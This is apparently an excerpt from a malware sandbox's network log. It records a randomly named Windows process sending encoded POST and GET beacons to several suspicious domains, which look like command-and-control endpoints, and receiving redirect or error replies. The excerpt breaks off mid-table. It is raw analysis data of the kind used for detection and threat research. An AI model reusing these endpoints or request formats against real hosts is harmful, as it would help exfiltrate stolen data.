                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=3RgQnu0q1W9PiWPQZWPaLQW+ooYjkHGNrhyPq0FrPzOvybYZfAnE1Uds0TnFbU8Q0p3TcSs4ZLyoj0gnfi64enmRu4+78IHebw+SzB4hCEBlx9IQvPNSJeS0TCkEHG71Ono5/secN5G9ne4VOnSYb4CIk/ji4hK0AvIRLazePK4mO4NcaxGQpU6Q1AP1WMcYnZK088E=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50104 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:19.676856995 CET | 833 | OUT | POST /gofy/ HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.wiretap.digital
                                                                                                                                                                            Referer: http://www.wiretap.digital/gofy/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=3RgQnu0q1W9Ph3/QeFnaNwWxnIYjvnGBrhOPqxguPAqvy7oZeBnEmkds8znAFk9e0p7hcQ44ZLOoj2oneVunf3mTjY+5koHebw+SzB8HCAVlyJ0QgONRD+S7SCkENm7pOnoL/tD7N/C9nb8VO2SbOICG5Piu2zrMNcQLUr28PMIPPO82ATO460WolTHCH89x96aEirQc02ZBfVeuymdkI3Bms4Fl
Dec 11, 2024 09:41:20.760881901 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50105 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:22.343019009 CET | 1754 | OUT | POST /gofy/ HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.wiretap.digital
                                                                                                                                                                            Referer: http://www.wiretap.digital/gofy/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Data Ascii: x6lPJLCP= [TRUNCATED]
Dec 11, 2024 09:41:23.425856113 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 50106 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:25.002953053 CET | 551 | OUT | GET /gofy/?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ== HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:41:26.093805075 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:41:25 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ=="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 50107 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:31.768153906 CET | 798 | OUT | POST /5l50/ HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.it2sp8.vip
                                                                                                                                                                            Referer: http://www.it2sp8.vip/5l50/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=mME0ZX0cZGtulAt8yC/dXULdG86/WlL3s+sW4YxfSzrXVCNLcMRrRkZzvxbTVBpy41D+tfto9ndcMttxW2zkfwAgguSDD8+mcVYq92LsfmE6aGYS4OJNml7aXrAyKeectg9IfW+YX8kIYrJSHWKL4DV5tAZea8xbyIAv87lxqc8SH+/PW8/L02/FTuh+lyZqW9LpAnE=
Dec 11, 2024 09:41:32.878454924 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 50108 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:34.422874928 CET | 818 | OUT | POST /5l50/ HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.it2sp8.vip
                                                                                                                                                                            Referer: http://www.it2sp8.vip/5l50/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=mME0ZX0cZGtukgd8xhXdQ0LaYM6/P1K8s+gW4ZkESBPXVjdLfIFrSkZzgRbWIxof41+DteRo9nJcMppxKRnjZgAu1+SBMc+mcVYq9yrCfiQ6aykS5vJOsF7VeLAybueYtg9qfUKyX/QIYpRSHHKIzDV/ggYCbtYz7rth3aMe+9EJCIOlMe3jnWT9D9pJ0C4DMebZewTudtRZX+bgcJUWRChnq4Vb
Dec 11, 2024 09:41:35.520178080 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 50109 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:37.081202030 CET | 1739 | OUT | POST /5l50/ HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.it2sp8.vip
                                                                                                                                                                            Referer: http://www.it2sp8.vip/5l50/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:41:38.158431053 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 50110 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:39.727699041 CET | 546 | OUT | GET /5l50/?x6lPJLCP=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBnieG4J/eeLMerUPxhx3GPRLnwREz1wysoKm2qVDM0wOtjw3A==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:41:40.814867020 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:41:40 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x6lPJLCP=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBnieG4J/eeLMerUPxhx3GPRLnwREz1wysoKm2qVDM0wOtjw3A==&rJl09=1ZZ8JloHsT"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50111 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:46.470304012 CET | 816 | OUT | POST /cvmn/ HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.cbprecise.online
                                                                                                                                                                            Referer: http://www.cbprecise.online/cvmn/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=pRevWou4FjqmLIyADWyCXou/61Rre5c+m+/mbcNf/X2GAduruLOViqUpD04IUQuRM8pvVkb8i4jHYGvv/Xqd8cW7UdQqRgv4NK+MQ0OgbhEZG+RqeAte4ZSx0gXUw6rOgKDh90o5U/qpSxy6b6kWkvupNpDIqYQPXKB6BqQzk8IvopuMjnuAeo4zjnp88/SHTvFWF6g=
Dec 11, 2024 09:41:47.548088074 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50112 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:49.125499010 CET | 836 | OUT | POST /cvmn/ HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.cbprecise.online
                                                                                                                                                                            Referer: http://www.cbprecise.online/cvmn/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=pRevWou4FjqmIoiACxmCRIu++FRrUZc6m+zmbZ1P+lSGB/2rvOiVjqUpWE4HbwuOM8lNVkX8i4nHYHfv/kyau8W9b9QsOwv4NK+MQ0qZbhcZGPhqMxtf7ZS2+AXU7arKgKC2910fU8epSza6VPQV9fuvJpCnsadwZbxdF5ww6aIJg/fm5FmoNIULz0hLtPzuJMVmbt1mJQjZ7CT7Hw76LFeyIrcx
Dec 11, 2024 09:41:50.205652952 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50113 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:51.768727064 CET | 1757 | OUT | POST /cvmn/ HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.cbprecise.online
                                                                                                                                                                            Referer: http://www.cbprecise.online/cvmn/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:41:52.848506927 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            28 | 192.168.2.5 | 50114 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Dec 11, 2024 09:41:54.423382998 CET | 552 | OUT | GET /cvmn/?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g== HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:41:55.509397030 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:41:55 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g=="}</script></head></html>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            29 | 192.168.2.5 | 50115 | 47.238.157.253 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Dec 11, 2024 09:42:01.650675058 CET | 801 | OUT | POST /tjfd/ HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.yun08ps.top
                                                                                                                                                                            Referer: http://www.yun08ps.top/tjfd/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=sWdcaPfzev/tiz4FU/Bz5cw0T3873eg1+c9n/p+R2mWHeaSadn9EPb2LeYc8X/eoKxkIJ6x/dN7ASSQoSg1lo3geiEJUzMKWnEDZaayhpVKgkTLe7VfnHt5IgoI9MSezwqyScwf/VbfIlzodntgbX4yWjK/ZOT1kp9DFFJrUCbJe66Pt0tqJ6aG2utj3dGhaAfv8yHQ=


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            30 | 192.168.2.5 | 50116 | 47.238.157.253 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Dec 11, 2024 09:42:04.298125982 CET | 821 | OUT | POST /tjfd/ HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.yun08ps.top
                                                                                                                                                                            Referer: http://www.yun08ps.top/tjfd/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=sWdcaPfzev/ttwgFWY9z+8w3PH87hug5+c5n/oqB3QmHf6CaHlZEOb2LU4d0KPeZKx4fJ7d/dNHASWcoRR1mungc3UJSu8KWnEDZaa2bpVyglj7e0UfgNN5Jw4I9bCf6wqzxc1/VVY3Il3sdn4cYAIyQtq/MHgw+ourNZbiWZoNT2s+HuPihp6qO++rAM2Aza8/MsQFRfcJevEqBFcWcXBUTuRuk


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            31 | 192.168.2.5 | 50117 | 47.238.157.253 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Dec 11, 2024 09:42:06.955275059 CET | 1742 | OUT | POST /tjfd/ HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.yun08ps.top
                                                                                                                                                                            Referer: http://www.yun08ps.top/tjfd/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP= [TRUNCATED]


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            32 | 192.168.2.5 | 50118 | 47.238.157.253 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Dec 11, 2024 09:42:09.609015942 CET | 547 | OUT | GET /tjfd/?x6lPJLCP=hU18Z//aae7PuBg9apJb96loanMP5/1Vub46+YuE1RepJ+epEltxKOfVY+omXPiOW2IODI1uSb7TTTd0R0t6pBQ2oDkul8elmVnFCv+DogCI8xDe2U6+F55NhYNnYDS/oA==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            33 | 192.168.2.5 | 50119 | 67.223.117.169 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Dec 11, 2024 09:42:37.207106113 CET | 816 | OUT | POST /mbcs/ HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.rtpsilva4d.click
                                                                                                                                                                            Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=J+GqkxZGxkCVsnVm63dJU9CAryFudCcGrWe69heVicdu/mm7UFqcG/+Up8+UE8L+yfsRy5ekljlpIe0vcwsish+kjXal1oFFBmEKBcjNGfGQFPMDSEV3O+LBKjZg1GtHk+bpd+0awzVY9js6sFkuW8EYm54YGvl1SqrZxlMln7ADDMMYqfeVx7wAkVPWU4V8hDK7e+A=
                                                                                                                                                                            Dec 11, 2024 09:42:38.414628983 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:38 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
